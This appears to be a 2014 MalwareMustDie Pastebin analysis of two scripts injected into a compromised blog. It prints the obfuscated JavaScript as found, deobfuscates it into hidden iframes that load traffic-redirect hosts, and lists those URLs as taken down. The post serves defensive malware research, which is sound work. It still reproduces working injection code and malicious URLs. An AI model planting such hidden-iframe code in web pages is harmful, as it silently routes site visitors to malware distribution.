Advertisement
MalwareMustDie

When Traffer and Infector crooks work together

Mar 2nd, 2014
2,043
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #MalwareMustDie
  2. #Case: Double injection by infector and traffer
  3. # unixfreaxjp | Feb 22th
  4.  
  5. /--- target ---/
  6.  
  7. http://blog.la-pur.com/
  8.  
  9. /---- double obs ----/
  10.  
  11. <script language="javascript" type="text/javascript">var k1='?gly#vw|oh@%ylvlelolw|=#klgghq>#srvlwlrq=#devroxwh>#ohiw=#4>#wrs=#4%A?liudph#vuf@%kwws=22',k2='0wugtu0khtcogeqwpvgt0tw1Au?3$"htcogdqtfgt?2"xurceg?2"jurceg?2"ykfvj?3"jgkijv?3"octikpykfvj?2"octikpjgkijv?2"uetqnnkpi?pq@>1khtcog@>1fkx@',t1=0,t2=0,h='';while(t1<=k1.length-1){h=h+String.fromCharCode(k1.charCodeAt(t1++)-3);}h=h+'bdicczzazbzbeb';while(t2<=k2.length-1){h=h+String.fromCharCode(k2.charCodeAt(t2++)-2);}document.write(h);</script><body> <script type="text/javascript">var xtgdxi = "%u0068%u0074%u0074%u0070%u003a%u002f%u002f%u0061%u0064%u0073%u002e%u0063%u006c%u006f%u0076%u0065%u0072%u0062%u0072%u0065%u0061%u006b%u0065%u0072%u0073%u002e%u0063%u006f%u002e%u0075%u006b%u002f%u0061%u0066%u0066%u0069%u006c%u0069%u0061%u0074%u0065%u002e%u0070%u0068%u0070%u003f%u0070%u0069%u0064%u003d%u0030%u0064%u0035%u0030%u0034%u0064%u0032%u0063%u0034%u0033%u0035%u0034%u0032%u0066%u0037%u0033%u0037%u0065%u0061%u0032%u0033%u0036%u0037%u0033%u0062%u0037%u0065%u0034%u0032%u0038%u0063%u0039"; var pzgek = document.createElement("iframe"); pzgek.style.width = "10px"; pzgek.style.height = "10px"; pzgek.style.border = "0px"; pzgek.frameBorder = "0"; pzgek.setAttribute("frameBorder", "0"); document.body.appendChild(pzgek); pzgek.src = unescape(xtgdxi);</script> </body>
  12.  
  13.  
  14. /--- 書き直したら ---/
  15.  
  16. <script language="javascript" type="text/javascript">
  17.     var k1 = '?gly#vw|oh@%ylvlelolw|=#klgghq>#srvlwlrq=#devroxwh>#ohiw=#4>#wrs=#4%A?liudph#vuf@%kwws=22',
  18.         k2 = '0wugtu0khtcogeqwpvgt0tw1Au?3$"htcogdqtfgt?2"xurceg?2"jurceg?2"ykfvj?3"jgkijv?3"octikpykfvj?2"octikpjgkijv?2"uetqnnkpi?pq@>1khtcog@>1fkx@',
  19.         t1 = 0,
  20.         t2 = 0,
  21.         h = '';
  22.     while (t1 <= k1.length - 1) {
  23.         h = h + String.fromCharCode(k1.charCodeAt(t1++) - 3);
  24.     }
  25.     h = h + 'bdicczzazbzbeb';
  26.     while (t2 <= k2.length - 1) {
  27.         h = h + String.fromCharCode(k2.charCodeAt(t2++) - 2);
  28.     }
  29.     document.write(h);
  30.  
  31. /--- deobfs ----/
  32.  
  33. <div style="visibility: hidden; position: absolute; left: 1; top: 1"><iframe src=
  34. "http://bdicczzazbzbeb.users.iframecounter.ru/?s=1" frameborder=0 vspace=0 hspace=0 width=1 height=1
  35.  marginwidth=0 marginheight=0 scrolling=no></iframe></div>
  36.  
  37.  
  38. /--- second obs --/
  39.  
  40.         var xtgdxi = "%u0068%u0074%u0074%u0070%u003a%u002f%u002f%u0061%u0064%u0073%u002e%u0063%u006c%u006f%u0076%u0065%u0072%u0062%u0072%u0065%u0061%u006b%u0065%u0072%u0073%u002e%u0063%u006f%u002e%u0075%u006b%u002f%u0061%u0066%u0066%u0069%u006c%u0069%u0061%u0074%u0065%u002e%u0070%u0068%u0070%u003f%u0070%u0069%u0064%u003d%u0030%u0064%u0035%u0030%u0034%u0064%u0032%u0063%u0034%u0033%u0035%u0034%u0032%u0066%u0037%u0033%u0037%u0065%u0061%u0032%u0033%u0036%u0037%u0033%u0062%u0037%u0065%u0034%u0032%u0038%u0063%u0039";
  41.         var pzgek = document.createElement("iframe");
  42.         pzgek.style.width = "10px";
  43.         pzgek.style.height = "10px";
  44.         pzgek.style.border = "0px";
  45.         pzgek.frameBorder = "0";
  46.         pzgek.setAttribute("frameBorder", "0");
  47.         document.body.appendChild(pzgek);
  48.         pzgek.src = unescape(xtgdxi);
  49.  
  50.         / cracks /
  51.        
  52.         var xtgdxi = "%u0068%u0074%u0074%u0070%u003a%u002f%u002f%u0061%u0064%u0073%u002e%u0063%u006c%u006f%u0076%u0065%u0072%u0062%u0072%u0065%u0061%u006b%u0065%u0072%u0073%u002e%u0063%u006f%u002e%u0075%u006b%u002f%u0061%u0066%u0066%u0069%u006c%u0069%u0061%u0074%u0065%u002e%u0070%u0068%u0070%u003f%u0070%u0069%u0064%u003d%u0030%u0064%u0035%u0030%u0034%u0064%u0032%u0063%u0034%u0033%u0035%u0034%u0032%u0066%u0037%u0033%u0037%u0065%u0061%u0032%u0033%u0036%u0037%u0033%u0062%u0037%u0065%u0034%u0032%u0038%u0063%u0039";
  53.         var pzgek = unescape(xtgdxi);
  54.         document.write(pzgek);
  55.  
  56.  
  57. / デコード /
  58.  
  59. http://ads.cloverbreakers.co.uk/affiliate.php?pid=0d504d2c43542f737ea23673b7e428c9
  60.  
  61.  
  62. /-- target list ---, whats this? ---/
  63.  
  64.  http://ads.cloverbreakers.co.uk/affiliate.php?pid=0d504d2c43542f737ea23673b7e428c9  // TANGO DOWN
  65.  http://bdicczzazbzbeb.users.iframecounter.ru/?s=1  // TANGO DOWN
  66.  
  67. #MalwareMustDie!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement